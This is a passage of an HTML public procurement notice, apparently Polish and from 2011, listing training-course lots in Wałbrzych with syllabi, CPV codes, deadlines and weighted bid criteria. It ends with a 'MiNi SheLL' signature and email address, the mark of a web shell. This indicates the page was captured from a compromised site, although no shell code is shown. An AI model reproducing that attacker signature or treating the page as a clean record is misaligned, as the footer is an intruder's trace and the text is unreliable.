3.	Ochrona przeciwporażeniowa
4.	Materiałoznawstwo 
5.	Budowa i eksploatacja napędów energetycznych oraz spawarek
6.	Budowa i eksploatacja stacji elektroenergetycznych
7.	Budowa i eksploatacja transformatorów oraz linii kablowych
8.	Budowa i eksploatacja instalacji elektroenergetycznych
9.	Zespoły prądotwórcze. Aparatura kontrolno - pomiarowo - elektryczna. Pomiar temperatury, ciśnienia przepływu
10.	Organizacja bezpiecznego wykonywania prac przy urządzeniach elektrycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadany certyfikat jakości świadczonych przez Wykonawcę usług - 10</li>
<li>3. doświadczenie Wykonawcy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Handlowiec doskonały z podstawami obsługi komputera, fakturowaniem oraz obsługą kas fiskalnych i terminali kart płatniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób: 			
Jedna grupa szkoleniowa licząca 10 osób.

Termin realizacji szkolenia:
19.09.2011r - 28.10.2011r. 

Miejsce realizacji szkolenia:
Teren miasta Wałbrzycha.
				
Program szkolenia powinien zawierać co najmniej wskazane poniżej minimum programowe:
1.	Nowoczesne techniki i metody sprzedaży
2.	Budowanie relacji z klientem
3.	Psychologia pracy z klientem
4.	Negocjacje handlowe, manipulacje w negocjacjach
5.	Podstawy obsługi komputera (edytor tekstu, podstawy arkusza kalkulacyjnego)
6.	Obsługa użytkowych programów komputerowych wykorzystywanych w pracy w handlu
7.	Obsługa kas fiskalnych  i terminali kart płatniczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 45</li>
<li>2. posiadany certyfikat jakości świadczonych przez Wykonawcę usług - 10</li>
<li>3. doświadczenie Wykonawcy - 20</li>
<li>4. kadra - 25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com